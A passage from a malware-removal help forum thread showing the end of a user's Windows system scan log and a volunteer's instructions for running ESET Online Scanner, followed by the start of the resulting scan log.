Linksys Linksys Wireless-G USB Network Adapter Driver - WUSB54Gv4 (HKLM\...\{C7EEF2B9-8C16-4A04-B98D-B1A952A47E55}) (Version: 1.0 - Linksys, A Division of Cisco Systems, Inc.)
Malwarebytes Anti-Malware version 2.1.4.1018 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.4.1018 - Malwarebytes Corporation)
Media Player Classic (HKLM\...\Media Player Classic) (Version:  - )
Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM\...\M2698023) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM\...\M2833941) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM\...\M979906) (Version:  - )
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.7.205.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Overland (Version: 2.1.5 - Hewlett-Packard) Hidden
Peggle Deluxe (HKLM\...\Peggle Deluxe) (Version:  - PopCap Games)
Personal Entertainment Launcher (HKLM\...\{37F964E4-9C3F-4066-B933-1747D3AC6737}) (Version: 1.00.0000 - Dell Inc.)
Photo Viewer 2.4 (HKLM\...\Photo Viewer_is1) (Version:  - )
PhotoGallery (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Photosmart 320,370,7400,8100,8400 Series (HKLM\...\{AAC4FC36-8F89-4587-8DD3-EBC57C83374D}) (Version: 2.0 - HP)
PowerDVD (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 8.1 - Dell)
Presto! BizCard 4.1 Eng (HKLM\...\Uninstall Presto! BizCard 4.1 Eng) (Version:  - )
PrintScreen (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Product Support Launcher (HKLM\...\{B8ABB25D-1E30-4ED7-A3CE-0F8BED439647}) (Version: 1.00.0000 - Dell Inc.)
PSPrinters06 (Version: 1.00.0000 - HP) Hidden
QFolder (Version: 1.00.0000 - Hewlett-Packard) Hidden
QuickProjects (Version: 43.1.5.000 - Hewlett-Packard) Hidden
QuickTime 7 (HKLM\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version:  - )
Revo Uninstaller 1.95 (HKLM\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Roxio Activation Module (HKLM\...\{07159635-9DFE-4105-BFC0-2817DB540C68}) (Version: 1.0 - Roxio)
Roxio Creator Audio (HKLM\...\{83FFCFC7-88C6-41C6-8752-958A45325C82}) (Version: 3.5.0 - Roxio)
Roxio Creator BDAV Plugin (HKLM\...\{880AF49C-34F7-4285-A8AD-8F7A3D1C33DC}) (Version: 3.5.0 - Roxio)
Roxio Creator Copy (HKLM\...\{619CDD8A-14B6-43A1-AB6C-0F4EE48CE048}) (Version: 3.5.0 - Roxio)
Roxio Creator Data (HKLM\...\{0D397393-9B50-4C52-84D5-77E344289F87}) (Version: 3.5.0 - Roxio)
Roxio Creator DE (HKLM\...\{C8B0680B-CDAE-4809-9F91-387B6DE00F7C}) (Version: 3.5.0 - Roxio)
Roxio Creator Tools (HKLM\...\{0394CDC8-FABD-4ED8-B104-03393876DFDF}) (Version: 3.5.0 - Roxio)
Roxio Express Labeler 3 (HKLM\...\{6675CA7F-E51B-4F6A-99D4-F8F0124C6EAA}) (Version: 3.2.1 - Roxio)
Roxio Update Manager (HKLM\...\{30465B6C-B53F-49A1-9EBA-A3F187AD502E}) (Version: 6.0.0 - Roxio)
Samsung New PC Studio (HKLM\...\InstallShield_{F193FC0E-9E18-40FC-A974-509A1BDD240A}) (Version: 1.00.0000 - Samsung Electronics Co., Ltd.)
Samsung New PC Studio (Version: 1.00.0000 - Samsung Electronics Co., Ltd.) Hidden
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.3.650.0 - SAMSUNG Electronics Co., Ltd.)
SkinsHP1 (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Sonic CinePlayer Decoder Pack (HKLM\...\{8D337F77-BE7F-41A2-A7CB-D5A63FD7049B}) (Version: 4.2.0 - Sonic Solutions)
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TBS WMP Plug-in (HKLM\...\InstallShield_{13515135-48BB-4184-8C1F-2FAE0138E200}) (Version: 1.00.676 - CNN)
TBS WMP Plug-in (Version: 1.00.676 - CNN) Hidden
The Witcher: Enhanced Edition (HKLM\...\Steam App 20900) (Version:  - CD Projekt RED)
TrayApp (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Unity Web Player (HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unload (Version: 4.0.0 - Hewlett-Packard) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
VC 9.0 Runtime (Version: 1.0.0 - Check Point Software Technologies Ltd) Hidden
VLC media player 1.0.1 (HKLM\...\VLC media player) (Version: 1.0.1 - VideoLAN Team)
WebReg (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{FDD810CA-D5E3-40E9-AB7B-36440B0D41EF}) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Media Player Firefox Plugin (HKLM\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000_Classes\CLSID\{38AB6A6C-CC4C-4f9e-A3DD-3C5681EF18A1}\InprocServer32 -> C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{38AB6A6C-CC4C-4 (the data entry has 48 more characters).
CustomCLSID: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000_Classes\CLSID\{3EC350A7-5C5E-4192-B734-E13722E10914}\InprocServer32 -> C:\Program Files\HP\HP Software Update\HPRulesEngine.dll (Hewlett-Packard Company)
CustomCLSID: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000_Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32 -> C:\Users\Angel\AppData\LocalLow\Unity\WebPlayer\loader\UnityWebPluginAX.ocx (Unity Technologies ApS)
 
==================== Restore Points  =========================
 
23-03-2015 11:44:32 Scheduled Checkpoint
26-03-2015 10:04:41 Windows Update
30-03-2015 12:03:45 Windows Update
02-04-2015 14:13:17 Windows Update
02-04-2015 18:17:48 Restore Operation
02-04-2015 18:53:53 Windows Update
02-04-2015 19:35:07 Windows Update
06-04-2015 12:53:05 Windows Update
08-04-2015 12:51:35 Scheduled Checkpoint
10-04-2015 16:46:36 Windows Update
11-04-2015 22:42:05 Removed iTunes
11-04-2015 22:46:02 Removed Bonjour
11-04-2015 22:49:56 Installed iTunes
12-04-2015 17:59:00 Windows Modules Installer
13-04-2015 13:03:15 Scheduled Checkpoint
13-04-2015 14:20:32 Revo Uninstaller's restore point - Coupon Printer for Windows
13-04-2015 14:22:36 Revo Uninstaller's restore point - Reimage Repair
13-04-2015 14:25:16 Revo Uninstaller's restore point - Shopping Helper Smartbar
13-04-2015 14:27:26 Revo Uninstaller's restore point - Shopping Helper Smartbar
13-04-2015 14:28:08 Revo Uninstaller's restore point - Shopping Helper Smartbar Engine
13-04-2015 21:06:33 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2006-11-02 05:23 - 2015-04-12 20:17 - 00451469 ____R C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost
 
There are 1000 more lines.
 
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {15B98890-7862-4EB6-9F04-C86AA4B30ED3} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {2B5725B7-C8CD-4C44-A84A-2D3E3C842E53} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-19] (Realtek)
Task: {2C62F3F5-FBF2-4876-9A8D-8BE4F136FB64} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-03-13] (Piriform Ltd)
Task: {3BBA328E-4379-4529-B561-54BA6D774C55} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-09-29] (Google Inc.)
Task: {3CAD3FE6-5704-4E5F-8796-36F6155E7BD5} - System32\Tasks\{597FAF1C-9F17-4FBC-917E-BDCD12142EB5} => pcalua.exe -a E:\setup.exe -d E:\
Task: {6586E20B-2210-4C87-8DA3-941E7CCB4C11} - System32\Tasks\Scan the system (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe
Task: {70A81FD7-F19C-48EF-B9A2-057CE879CF79} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-04] (Adobe Systems Incorporated)
Task: {7CDC9FA6-084D-42D0-9D11-267A98778EF1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-09-29] (Google Inc.)
Task: {8B2810B7-292B-4C79-9C55-05F873DF7A5F} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {ED5063D5-5DB8-447F-98FF-1F9CF2EBBDE0} - System32\Tasks\Check for updates (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
Task: {FAFBC4FC-F442-4283-B32F-F0F4D650782F} - System32\Tasks\Refresh immunization (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe
Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe
Task: C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe
 
==================== Loaded Modules (whitelisted) ==============
 
2014-01-20 14:17 - 2014-01-20 14:17 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-01-20 23:35 - 2015-01-20 23:35 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2014-09-29 09:15 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-09-29 09:15 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files\Spybot - Search & Destroy 2\DEC150.bpl
2014-09-29 09:15 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-09-29 09:15 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files\Spybot - Search & Destroy 2\sqlite3.dll
2014-09-29 09:15 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2015-01-06 08:18 - 2015-01-06 08:18 - 00039192 _____ () C:\Program Files\CCleaner\branding.dll
2013-07-11 03:07 - 2013-07-11 03:07 - 03391488 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\mscorlib\1.0.5000.0__b77a5c561934e089_a87a9960\mscorlib.dll
2013-07-11 03:06 - 2013-07-11 03:06 - 03035136 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system.windows.forms\1.0.5000.0__b77a5c561934e089_6eec51ce\system.windows.forms.dll
2013-07-11 03:06 - 2013-07-11 03:06 - 01966080 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system\1.0.5000.0__b77a5c561934e089_3b70900d\system.dll
2013-07-11 03:07 - 2013-07-11 03:07 - 00843776 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system.drawing\1.0.5000.0__b03f5f7f11d50a3a_318f459e\system.drawing.dll
2013-07-11 03:06 - 2013-07-11 03:06 - 02088960 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system.xml\1.0.5000.0__b77a5c561934e089_c7963648\system.xml.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vsmon => ""="Service"
 
==================== EXE Association (whitelisted) ===============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Angel\AppData\Roaming\Microsoft\Windows Live Photo Gallery\Windows Live Photo Gallery Wallpaper.jpg
DNS Servers: 192.168.1.254
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1464855766-1936325176-3098395914-500 - Administrator - Disabled)
Angel (S-1-5-21-1464855766-1936325176-3098395914-1000 - Administrator - Enabled) => C:\Users\Angel
ASPNET (S-1-5-21-1464855766-1936325176-3098395914-1002 - Limited - Enabled)
Guest (S-1-5-21-1464855766-1936325176-3098395914-501 - Limited - Disabled)
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (04/14/2015 11:44:48 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/14/2015 11:37:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application notepad.exe, version 6.0.6001.18000, time stamp 0x47918ea2, faulting module gdiplus.dll_unloaded, version 0.0.0.0, time stamp 0x54c99538, exception code 0xc0000005, fault offset 0x73ff74b2,
process id 0x1388, application start time 0xnotepad.exe0.
 
Error: (04/14/2015 11:27:27 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/13/2015 08:54:52 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/13/2015 03:36:30 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/13/2015 02:36:00 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/13/2015 02:28:08 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
Error: (04/13/2015 02:27:26 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
Error: (04/13/2015 02:25:15 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
Error: (04/13/2015 02:22:36 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
 
System errors:
=============
Error: (04/14/2015 11:43:28 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.
 
New Signature Version: 
 
Previous Signature Version: 1.195.3225.0
 
Update Source: %NT AUTHORITY59
 
Update Stage: 4.7.0205.00
 
Source Path: 4.7.0205.01
 
Signature Type: %NT AUTHORITY602
 
Update Type: %NT AUTHORITY604
 
User: NT AUTHORITY\SYSTEM
 
Current Engine Version: %NT AUTHORITY605
 
Previous Engine Version: %NT AUTHORITY606
 
Error code: %NT AUTHORITY607
 
Error description: %NT AUTHORITY608
 
Error: (04/14/2015 11:43:09 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: 1Restart the serviceWindows Search%%1056
 
Error: (04/14/2015 11:42:39 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Windows Search1300001Restart the service
 
Error: (04/14/2015 11:42:25 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Software Licensing11200001Restart the service
 
Error: (04/14/2015 11:39:39 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: 1Restart the serviceSpybot-S&D 2 Scanner Service%%1056
 
Error: (04/14/2015 11:39:26 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {9E175B6D-F52A-11D8-B9A5-505054503030}
 
Error: (04/14/2015 11:38:37 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Spybot-S&D 2 Scanner Service1600001Restart the service
 
Error: (04/14/2015 11:38:36 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Bonjour Service1
 
Error: (04/14/2015 11:38:36 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Apple Mobile Device1600001Restart the service
 
Error: (04/14/2015 11:38:36 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Intel® Matrix Storage Event Monitor1
 
 
Microsoft Office Sessions:
=========================
Error: (03/26/2014 06:52:30 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6690.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 8129 seconds with 3120 seconds of active time.  This session ended with a crash.
 
Error: (03/24/2014 07:49:14 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6690.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 17 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (03/24/2014 07:48:48 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6690.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 2505 seconds with 1020 seconds of active time.  This session ended with a crash.
 
Error: (03/12/2014 09:18:57 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6690.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 14721 seconds with 6540 seconds of active time.  This session ended with a crash.
 
Error: (12/15/2013 07:23:08 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6683.5002, Microsoft Office Version: 12.0.6612.1000. This session lasted 19238 seconds with 3120 seconds of active time.  This session ended with a crash.
 
Error: (12/15/2013 02:02:18 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6683.5002, Microsoft Office Version: 12.0.6612.1000. This session lasted 284 seconds with 180 seconds of active time.  This session ended with a crash.
 
Error: (12/15/2013 01:56:07 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6683.5002, Microsoft Office Version: 12.0.6612.1000. This session lasted 9327 seconds with 2760 seconds of active time.  This session ended with a crash.
 
Error: (09/30/2013 08:41:20 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6683.5001, Microsoft Office Version: 12.0.6612.1000. This session lasted 49 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
CodeIntegrity Errors:
===================================
  Date: 2015-04-14 23:47:54.422
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:54.156
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:53.907
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:53.642
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:53.064
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:52.815
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:52.550
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:52.206
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:28.569
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:28.304
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™2 Duo CPU E7300 @ 2.66GHz
Percentage of memory in use: 62%
Total physical RAM: 3036.26 MB
Available physical RAM: 1125.52 MB
Total Pagefile: 6287.5 MB
Available Pagefile: 4284.48 MB
Total Virtual: 2047.88 MB
Available Virtual: 1912.54 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:288.04 GB) (Free:158.25 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:10 GB) (Free:4.79 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: 38000000)
Partition 1: (Not Active) - (Size=55 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=10 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=288 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================


#6 deeprybka

  • Malware Response Team

Posted 15 April 2015 - 06:21 AM

:thumbup2:

Step 1

Please download ESET Online Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start the installer with administrator privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Choose the following settings:
    [image: settings.png]
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed, click on Finish.
  • A log file is created at [image: logpath.png]
    Copy and paste the content of this log file in your next reply.

Note: Do not forget to re-enable your antivirus application after running the above scan!



Can you please tell me which problems still persist now?
regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 

#7 SereneSnake

  • Topic Starter

  • Members

Posted 16 April 2015 - 02:19 AM

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=10b2dafc2ff4a5459f825eb6e4fcaf00
# engine=23408
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
